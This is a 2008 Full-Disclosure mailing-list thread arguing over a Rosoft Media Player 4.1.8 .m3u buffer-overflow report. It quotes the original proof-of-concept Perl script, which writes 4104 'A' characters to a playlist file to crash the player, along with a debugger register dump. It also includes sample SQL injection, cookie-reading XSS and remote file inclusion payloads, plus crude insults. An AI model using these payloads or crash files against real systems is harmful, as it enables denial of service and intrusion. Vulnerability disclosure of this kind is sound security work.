Full Disclosure: Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

From: securfrog <securfrog () gmail com>
Date: Fri, 15 Feb 2008 15:07:46 -0500

Well ... nice vision here ... then in this case , let's stop
posting injection sql , xss , rfi , lfi and all kind of web application
bugs .
We know how much talent it takes to find theses bugs,on these cms you
can find , on cnet ,
download.com , sourceforge and stuff.

[
var=123
var=-1+union/* => wow .. injection
var=<script>alert(document.cookie)</script> => wow xss
var=http://bla.com/file.txt? => wow code exec
etc ...
]

Let's do the same with ftp servers , finding a CWD AA crash
is pretty dummy to doh.

Bugs are now rated by originality, not the impact , thanks for the
notification reepex .








2008/2/15, reepex <reepex () gmail com>:


can you please stop sending this retarded crap... we all know how much
talent it takes to write thousands of As to a file and then open it with
every application on cnet download.com and sourceforge but we do not care


On Fri, Feb 15, 2008 at 12:07 PM, lorenzo <securfrog () gmail com> wrote:

###############################################################################################
#Rosoft Media Player  4.1.8  Remote Buffer Overflow ( .M3U)
#
# @nolife : Pow...Pow ..If you are kind i'll show you my set of supers
mega Tools, fuzzers ,and all the automated stuff  i use For M3U/ASX/PLS
Pow..Pow ...
# Nolifing is actually a Disease... Do not be mean with nolife's
#
#
#   eax=41414141 ebx=41414141 ecx=00000000 edx=00ba9078 esi=0012eb7c
edi=00ba9078
#   eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0         nv up ei pl
nz na pe nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
 efl=00010206
#   RosoftMediaPlayerFree+0x3b9c:
#   00403b9c 8b10            mov     edx,dword ptr [eax]
ds:0023:41414141=????????
#
#
my $chars= "A" x 4104;
my $file="I_Shot_The_Nolife.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) lorenzo (Feb 15)
- Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) reepex (Feb 15)
  - Message not available
    - Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) reepex (Feb 15)
    - Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) Fredrick Diggle (Feb 15)
  - Message not available
    - Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) securfrog (Feb 16)
- Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) Captain McShanks (Feb 15)